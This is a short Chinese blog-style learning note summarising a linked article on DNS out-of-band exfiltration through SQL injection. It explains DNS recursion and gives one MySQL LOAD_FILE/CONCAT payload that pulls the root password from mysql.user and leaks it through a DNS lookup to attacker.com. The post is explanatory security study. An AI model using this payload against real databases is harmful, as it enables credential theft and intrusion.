这个技巧有些另类,当时某业界大佬提点了一下。当时真的真的没有理解到那种程度,现在可能也是没有理解到,但是我会努力。
本文章是理解于:http://netsecurity.51cto.com/art/201503/469621.htm
链接中的文章主要说的是什么?
先愉快的介绍了DNS工作原理,注意其中有一个术语叫做递归。这个是DNS服务关键的一部分。
这种攻击方式需要提前能查看DNS日志,利用SQL注入语句返回信息,迫使DNS递归,然后DNS日志的记录。
日志中就有SQL注入返回信息了。
例如:
SELECT LOAD_FILE(CONCAT('\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.attacker.com\foobar'));
返回了:\\返回值(password).attacker.com\foobar。触发了DNS递归,导致日志记录。